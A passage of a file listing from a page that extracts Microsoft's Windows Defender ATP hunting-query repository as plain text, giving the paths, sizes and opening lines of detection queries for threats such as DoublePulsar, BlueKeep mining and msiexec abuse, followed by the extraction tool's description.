"chars": 2012,
"preview": "// Find which uncommon Powershell Cmdlets were executed on that machine in a certain time period.\n// This covers all Pow"
},
{
"path": "Execution/PowershellCommand footprint.txt",
"chars": 1266,
"preview": "// Find all machines running a given Powersehll cmdlet.\n// This covers all Powershell commands executed in the Powershel"
},
{
"path": "Execution/Webserver Executing Suspicious Applications.md",
"chars": 1860,
"preview": "# Webserver Executing Suspicious Applications\n\nThis query looks for common webserver process names and identifies any pr"
},
{
"path": "Execution/check-for-shadowhammer-activity-implant.md",
"chars": 1904,
"preview": "# Check for ShadowHammer-related implant or container activity\n\nThis query was originally published in the threat analyt"
},
{
"path": "Execution/detect-anomalous-process-trees.md",
"chars": 10244,
"preview": "# Detect anomalous process trees\n\nThis query generates process trees of given processes and performs anomaly detection o"
},
{
"path": "Execution/detect-bluekeep-related-mining.md",
"chars": 2741,
"preview": "# Detect BlueKeep-related cryptocurrency mining\n\nThis query was originally published in the threat analytics report, *Ex"
},
{
"path": "Execution/detect-doublepulsar-execution.md",
"chars": 1911,
"preview": "# Detect DoublePulsar execution\n\nThis query was originally published in the threat analytics report, *Motivated miners*."
},
{
"path": "Execution/detect-exploitation-of-cve-2018-8653.md",
"chars": 1763,
"preview": "# Detect exploitation of the Internet Explorer remote code execution vulnerability, CVE-2018-8653\n\nThis query was origin"
},
{
"path": "Execution/detect-malcious-use-of-msiexec.md",
"chars": 2382,
"preview": "# Detect malicious use of Msiexec\n\nThis query was originally published in the threat analytics report, *Msiexec abuse*.\n"
}
]
// ... and 186 more files (download for full content)
About this extraction
This page contains the full source code of the microsoft/WindowsDefenderATP-Hunting-Queries GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 386 files (5.9 MB), approximately 1.6M tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.